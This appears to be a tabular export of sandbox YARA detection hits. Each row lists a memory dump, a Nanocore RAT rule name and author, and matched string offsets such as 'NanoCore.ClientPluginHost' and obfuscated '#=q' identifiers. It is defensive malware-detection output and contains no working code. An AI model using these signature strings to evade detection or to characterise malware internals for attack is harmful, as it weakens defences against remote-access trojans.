0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
